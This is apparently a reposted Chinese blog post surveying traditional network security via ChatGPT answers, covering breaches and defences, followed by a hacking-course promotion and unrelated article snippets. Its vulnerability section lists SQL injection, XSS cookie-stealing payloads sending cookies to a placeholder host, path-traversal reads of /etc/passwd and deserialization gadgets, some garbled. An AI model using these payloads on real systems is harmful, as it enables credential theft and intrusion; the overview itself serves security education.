ChatGPT:你真的了解网络安全吗?浅谈攻击防御进行时之传统的网络安全

ChatGPT(全名:Chat Generative Pre-trained Transformer),美国OpenAI 研发的聊天机器人程序,是人工智能技术驱动的自然语言处理工具。

在这里插入图片描述 基于其语言模型庞大、可控制、具有高度扩展性的特点,本文通过对话ChatGPT,浅谈网络安全攻击防御进行时。

传统的网络安全

在这里插入图片描述 提问ChatGPT:什么是传统的网络安全,主要包括哪些方面? ChatGPT回答如下:

传统的网络安全主要是指对计算机网络系统的保护和防御措施,
以保护计算机网络不受攻击、破坏或窃取敏感数据。

基于对网络安全领域的普遍理解和实践,传统的网络安全主要包括以下方面:

  1. 防火墙

威胁:入侵、木马、病毒等恶意攻击。黑客可能会通过漏洞或社交工程等手段突破防火墙,并在系统内部进行攻击和篡改。

2013年,美国零售巨头塔吉特公司(Target)的网络系统遭到黑客攻击,导致近700万张信用卡数据泄露。调查结果表明,黑客是通过一名供应商的帐号登录了塔吉特公司的网络,然后利用漏洞绕过了防火墙,最后成功入侵系统,窃取大量敏感数据。

防范措施:加强防火墙的安全性和可靠性,包括设置复杂密码、定期更新软件等措施。此外,也可以采用 IPS、IDS 等高级安全设备对网络流量进行深度筛查,及时发现和阻断潜在的攻击行为。

  1. 加密技术

威胁:数据泄露、窃取和篡改等。黑客可能会通过截获数据包、恶意软件等方式窃取加密数据,并对其进行篡改。

2017年,全球最大的金融机构之一的美国信用报告公司Equifax遭受了历史上最大的数据泄露事件之一,超过1.43亿人的个人信息和社会安全号码被盗。事件调查发现,黑客利用了一个已知漏洞,从而绕过了Equifax的加密机制,获取了大量的敏感数据。

前有些加密算法已经被广泛认为是不安全的或容易受到攻击,例如:

MD5:MD5是一种常用的哈希算法,但它已经被证明存在严重的弱点和碰撞攻击,并且不再适合用于安全敏感的应用程序中。SHA-1:SHA-1也是一种常见的哈希算法,但它已经被证明存在严重的碰撞攻击和安全问题,并且已经被推荐不再使用。RC4:RC4是一种对称加密算法,曾在许多应用程序中广泛使用。但是,它被证明存在严重的安全问题,并且被建议不再使用。

防范措施:采用更加安全的加密算法和密钥管理机制,同时也需要对加密协议进行随机性、不可预测性和完整性验证。此外,采用数字证书认证等技术,确保通信双方的身份真实和信息安全。

在这里插入图片描述

  1. 认证与授权

威胁:密码破解、伪造身份等。黑客可能会通过暴力破解、社交工程、钓鱼等方式获取合法用户的账号密码和身份证明,从而进行未授权访问。

2018年,Facebook 遭到了一次大规模的黑客攻击,影响到了超过5000万用户的账户。黑客利用一个代码漏洞,盗用了大量的访问令牌,从而获取了用户的个人信息和私密消息。这次事件直接暴露了 Facebook 认证机制的漏洞,也引起了人们对社交媒体隐私的关注。

防范措施:采用更加安全和复杂的密码策略和认证机制,如多因素身份验证等。此外,也需要实行严格的访问控制和审计机制,避免未授权访问和恶意行为。

  1. 漏洞管理

威胁:黑客可能利用系统漏洞进行攻击和渗透。

2019年,美国政府网络安全机构 NSA 发布了一份警告,称黑客组织正在利用漏洞攻击一些受害者的 VPN 门户。这些攻击活动被称为“Pulse Secure VPN”攻击,黑客利用了特定版本 VPN 的漏洞,以获取管理员授权、执行代码和窃取敏感数据等。

SQL注入常见攻击方式:

select * from users where name='qiu' or 1=1 # and password='xxx'select * from user where name='qiu' or 1=1 #' and pass=''SELECT * FROM users WHERE id=1 AND 1=(SELECT COUNT(*) FROM users GROUP BY CONCAT_WS(':', username, password));SELECT * FROM users WHERE name='输入的用户名';SELECT * FROM users WHERE name='' CONVERT(int, (SELECT TOP 1 password_hash FROM users)) 
-- ';SELECT * FROM users WHERE username = 'qiu'--'  AND password = 'xx'SELECT * FROM users WHERE id = 1 AND (SELECT COUNT(*) FROM users) > 0SELECT * FROM users WHERE username='admin' UNION SELECT credit_card_number, expiration_date FROM credit_cardsSELECT * FROM users WHERE username='admin' UNION SELECT NULL,NULL,NULL FROM information_schema.tables --

具体可参考:[网络安全]SQL注入原理及常见攻击方法简析

xss常见攻击方式:

基础PAYLOAD:

<script>alert('XSS')</script>

直接弹出一个提示框


图片加载PAYLOAD:

<img src=x onerror="alert('XSS!')">

当加载这个图片时,会触发一段恶意脚本


链接跳转PAYLOAD:

<a href="javascript:alert('XSS')">点击我</a>

当用户点击链接时,会执行其中的脚本


Cookie盗取PAYLOAD:

<script>new Image().src="http://xx.com/steal.php?cookie="+document.cookie;</script>

将用户的Cookie信息发送到远程服务器


跳转到假登录页面PAYLOAD:

 <script>document.location="http://xx.com/login.php?user="+document.cookie;</script>

伪装成登录页面欺骗用户提交用户名和密码


文件包含常见攻击方式:

相对路径Payload:一些应用程序可能允许用户输入一个相对路径,攻击者可以使用“…/”等相对路径限制符,访问应用程序目录之外的文件。

../etc/passwd(将会列出除root以外的所有Linux用户信息)

绝对路径Payload:攻击者可以使用绝对路径访问系统中的文件,如 /etc/passwd 等。

NULL字节Payload:有些应用程序在处理文件名时,只识别空字节之前的字符,而忽略后面的内容。因此,攻击者可以将 “%00” 或 “\0”(空字符)添加到文件名中,欺骗应用程序只访问他们指定的文件。

../../../../../../../../../../etc/passwd%00

PHP伪协议Payload:如果应用程序使用PHP作为服务器端脚本解释器,攻击者可以使用PHP伪协议访问远程文件。

  php://filter/convert.base64-encode/resource=../../../etc/passwd

其他协议Payload:除了php协议,攻击者还可以使用其他协议来读取远程文件,比如 file , ftp 等。

file:///etc/passwd

序列化反序列化常见攻击方式: Java利用Payload:Java中常见的序列化和反序列化攻击方式是使用 ObjectInputStream 类进行攻击,攻击者可以构造一个包含恶意代码的序列化对象,例如:

public class Exploit implements Serializable {public Exploit() throws Exception {Runtime.getRuntime().exec("calc.exe");}}

然后将该对象序列化并通过网络发送到目标应用程序中,运行该序列化对象时就会执行恶意代码(在本例中是打开计算器)。

PHP 利用Payload:PHP中常见的序列化和反序列化攻击方式是使用 unserialize 函数来执行任意代码,攻击者可以构造一个包含恶意代码的序列化字符串,例如:

O:6:"Exploit":0:{}

当应用程序使用 unserialize 函数解析该字符串时,就会执行恶意代码。

Python 利用Payload:Python中支持使用 pickle 模块对对象进行序列化和反序列化,攻击者可以构造一个恶意代码并使用 pickle.dump 将其序列化,例如:

import os
class Exploit(object):
def reduce(self):
return (os.system,('calc.exe',))

然后将序列化后的恶意代码发送到目标系统中,使用 pickle.load 可以执行这个恶意代码。


防范措施:建立和实施完善的漏洞管理制度,及时发现和修补系统中的漏洞。同时,也需要定期进行漏洞扫描和评估,确保系统的安全性和稳定性。

  1. 安全策略

威胁:安全策略不完善、执行不到位等因素可能导致系统被黑客攻击和入侵。

2007年,中国移动曾因为短信群发功能易被利用进行违法行为而被罚款,这直接暴露出其安全策略存在缺陷和漏洞。此后,中国移动加强了对短信平台的监管和管理,并加强了电子认证及授权方面的技术和应用,提高了对违法行为的识别和预防能力。

防范措施:建立健全的安全策略和规则,包括网络访问控制、数据备份、应急响应等方面。同时,也需要加强对员工的培训和意识教育,提高他们的安全意识和能力,减少人为因素对系统安全性的影响。

提问ChatGPT:传统网络安全的侧重点在于什么? ChatGPT回答如下: 在这里插入图片描述

传统的网络安全措施重点在于抵御来自外部的攻击和威胁,以保障计算机网络的安全性和稳定性。但是,随着数字化时代的快速发展和信息化程度不断提高,网络安全面临着越来越多的挑战和新型威胁。


总结

以上为浅谈攻击防御进行时之传统的网络安全。

关注我,遇见攻击新姿势,吸纳网安新知识。

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享🎁

😝朋友们如果有需要全套《黑客&网络安全入门&进阶学习资源包》,可以扫描下方二维码免费领取

1️⃣零基础入门

① 学习路线

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

img

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供:

img

因篇幅有限,仅展示部分资料

2️⃣视频配套资料&国内外网安书籍、文档

① 文档和书籍资料

img

② 黑客技术

img

因篇幅有限,仅展示部分资料

3️⃣网络安全源码合集+工具包

img

4️⃣网络安全面试题

面试题
上述所有资料 ⚡️ ,朋友们如果有需要全套 📦《网络安全入门+进阶学习资源包》,可以扫描下方二维码免费领取 🆓

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/706977.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

111期_C++_2024年1月份作业博客_选择题错题总结

一、野指针问题&#xff1a;在定义的时候没有初始化&#xff0c;就不能能用scanf 或 printf 二、一个变量出现在表达式的两边作为两个不同的操作数&#xff0c; 并且其中一个操作数带有&#xff0c;此时表达式出现歧义 三、两端出栈问题&#xff1a; 错因&#xff1a;未理解题…

素皮材质的手机壳,如何才能做到经久耐用?

近几年&#xff0c;素皮材质开始在手机背壳上开始应用&#xff0c;各家手机厂商&#xff0c;基本都给自己的旗舰系列设备推出了带素皮材质版本的手机款式&#xff0c;比如华为的Mate 60系列&#xff0c;不仅Pro版本有素皮材质&#xff0c;Pro版本更是黑白两款全是素皮材质。 那…

Docker的基础知识与应用技巧

文章目录 一.docekr简介二.docekr安装三.docker命令 一.docekr简介 Docker是一个开源的应用容器引擎&#xff0c;它可以让开发者打包他们的应用以及依赖包到一个可移植的镜像中&#xff0c;然后发布到任何流行的Linux或Windows操作系统的机器上。Docker基于轻量级虚拟化技术&a…

交易这条路,没有永远的大神,唯有攀登者

一、摆平心态 很多人一谈及金融&#xff0c;首先想到的就是赚钱&#xff0c;而忽视了亏损和风险的存在。面对亏损时&#xff0c;许多人不是选择止损&#xff0c;而是选择加仓&#xff0c;希望通过大赚一笔来弥补损失。然而&#xff0c;这种做法往往会让他们在市场中受到惨痛的教…

桥接模式(Bridge Pattern) C++

上一节&#xff1a;适配器模式&#xff08;Adapter Pattern&#xff09; C 文章目录 0.理论1.组件2.使用场景 1.实践 0.理论 桥接模式&#xff08;Bridge Pattern&#xff09;是一种结构型设计模式&#xff0c;它的核心思想是将抽象部分与其实现部分分离&#xff0c;使它们可…

mac打不开xxx软件, 因为apple 无法检查其是否包含恶意

1. 安全性与隐私下面的允许来源列表&#xff0c;有些版本中的‘任何来源’选项被隐藏了&#xff0c;有些从浏览器下载的软件需要勾选这个选项才能安装 打开‘任何来源’选项 sudo spctl --master-disable 关闭‘任何来源’选项 sudo spctl --master-enable

leetcode 2.27

leetcode hot 100 哈希1.字母异位词分组2.最长连续序列 双指针1.盛最多水的容器2.和为 K 的子数组 数组1.除自身以外数组的乘积 哈希 1.字母异位词分组 49. 字母异位词分组 方法一&#xff1a;排序 由于互为字母异位词的两个字符串包含的字母相同&#xff0c;因此对两个字符…

nginx---------------重写功能 防盗链 反向代理 (五)

一、重写功能 rewrite Nginx服务器利用 ngx_http_rewrite_module 模块解析和处理rewrite请求&#xff0c;此功能依靠 PCRE(perl compatible regular expression)&#xff0c;因此编译之前要安装PCRE库&#xff0c;rewrite是nginx服务器的重要功能之一&#xff0c;重写功能(…

React回顾

一、基础 1、使用babel解析 2、不直接使用jsx&#xff0c;jsx写起来很繁琐 3、jsx语法规则 4、函数式组件的使用 5、函数式组件渲染 6、类组件渲染 7、类组件中事件调用this指向问题 8、类组件不能直接改变状态 9、props接收数据类型限制 类型限制放到类组件内部&#xff0c;用…

基于YOLOv8/YOLOv7/YOLOv6/YOLOv5的生活垃圾检测与分类系统(Python+PySide6界面+训练代码)

摘要&#xff1a;本篇博客详细讲述了如何利用深度学习构建一个生活垃圾检测与分类系统&#xff0c;并且提供了完整的实现代码。该系统基于强大的YOLOv8算法&#xff0c;并进行了与前代算法YOLOv7、YOLOv6、YOLOv5的细致对比&#xff0c;展示了其在图像、视频、实时视频流和批量…

Day03:Web架构OSS存储负载均衡CDN加速反向代理WAF防护

目录 WAF CDN OSS 反向代理 负载均衡 思维导图 章节知识点&#xff1a; 应用架构&#xff1a;Web/APP/云应用/三方服务/负载均衡等 安全产品&#xff1a;CDN/WAF/IDS/IPS/蜜罐/防火墙/杀毒等 渗透命令&#xff1a;文件上传下载/端口服务/Shell反弹等 抓包技术&#xff1a…

非线性优化资料整理

做课题看了一些非线性优化的资料&#xff0c;整理一下&#xff0c;以方便查看&#xff1a; 优化的中文博客 数值优化|笔记整理&#xff08;8&#xff09;——带约束优化&#xff1a;引入&#xff0c;梯度投影法 (附代码)QP求解器对比对于MPC的QP求解器 数值优化| 二次规划的…

【Godot4自学手册】第十七节主人公的攻击和敌人的受伤

本节主要学习主人公是如何向敌人发起进攻的&#xff0c;敌人是如何受伤的&#xff0c;受伤时候动画显示&#xff0c;击退效果等。其原理和上一节内容相同&#xff0c;不过有许多细节需要关注和完善。 一、修改Bug 在本节学习之前&#xff0c;我将要对上一节的代码进行完善&am…

租赁系统|租赁软件提供免押金等多种租赁方式

租赁小程序是一种全新的租赁模式&#xff0c;为用户提供了免押金、多种租赁方式、定制化服务等多项优势&#xff0c;让用户的租赁体验更加美好。让我们来了解一下它的特点和功能。 首先&#xff0c;租赁小程序支持租完即送&#xff0c;无需等待固定租期。它提供了多种租赁方式&…

NR 2-STEP RA Absolute Timing Advance Command MAC CE的应用场景

3 GPP在 R2-2002413中将2-step RA引入&#xff0c;进而R16 38.321出现了 Absolute TAC MAC CE&#xff0c;在 NR Timing Advance(TA)_ntn rrc-CSDN博客 有提到这个MAC CE&#xff0c;当时以“absolute timing advance command MAC CE 在2-step RA的某个场景下使用”一笔带过&am…

设计模式----装饰器模式

在软件开发过程中&#xff0c;有时想用一些现存的组件。这些组件可能只是完成了一些核心功能。但在不改变其结构的情况下&#xff0c;可以动态地扩展其功能。所有这些都可以釆用装饰器模式来实现。 装饰器模式 允许向一个现有的对象添加新的功能&#xff0c;同时又不改变他的…

MQTT协议解析:揭秘固定报头、可变报头与有效载荷的奥秘

MQTT&#xff08;Message Queuing Telemetry Transport&#xff0c;消息队列遥测传输协议&#xff09;是一种轻量级的通讯协议&#xff0c;常用于远程传感器和控制设备的通讯。MQTT协议基于发布/订阅模式&#xff0c;为大量计算能力有限且工作在低带宽、不可靠网络环境中的设备…

Java集合基础梳理(集合体系+ArrayList)

目录 Java集合体系 为什么要使用集合类 ? 如何选用集合? 哪些集合类是线程安全的&#xff1f;哪些不安全&#xff1f; 快速失败(fail-fast)和安全失败(fail-safe)的区别是什么&#xff1f; 遍历的同时修改一个List有几种方式 ArrayList 如何进行元素的遍历操作&#x…

Spring Boot项目误将Integer类型写成int来进行传参

在处理项目中Idea中无报错&#xff1a; 问题&#xff1a; localhost:8080/param/m2在浏览器中输入&#xff1a;localhost:8080/param/m2 产生报错&#xff1a; This application has no explicit mapping for /error, so you are seeing this as a fallback. Tue Feb 27 20:55…

Redis哨兵模式和Redis Cluster模式

文章目录 &#x1f50a;博主介绍&#x1f964;本文内容Redis Cluster 模式支持自动故障转移功能吗&#xff1f;Redis Cluster 模式支持自动故障转移功能和哨兵有什么区别&#xff1f;Redis Cluster 模式和哨兵模式&#xff08;Sentinel&#xff09;在自动故障转移方面有一些关键…